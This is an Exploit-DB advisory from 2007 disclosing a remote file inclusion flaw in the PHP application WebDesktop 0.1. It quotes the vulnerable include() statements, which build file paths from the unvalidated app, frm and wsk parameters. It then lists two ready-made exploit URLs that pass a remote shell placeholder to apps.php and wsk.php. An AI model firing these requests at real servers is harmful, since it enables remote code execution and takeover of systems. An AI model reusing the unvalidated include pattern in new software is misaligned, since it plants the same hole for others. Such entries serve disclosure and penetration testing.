WebDesktop 0.1 - Remote File Inclusion

EDB-ID:

4518


Author:

S.W.A.T.

Type:

webapps


Platform:

PHP

Date:

2007-10-11


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  WebDesktop 0.1
              Download :  http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              Y! ID    :  Svvateam
              E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
              Dork     :   :( 
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

include($wsk . ".wsk/" . $wsk . ".php");

&&&&&&&&

include($app . ".app/" . $frm . ".frm/" . $frm . ".php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-11]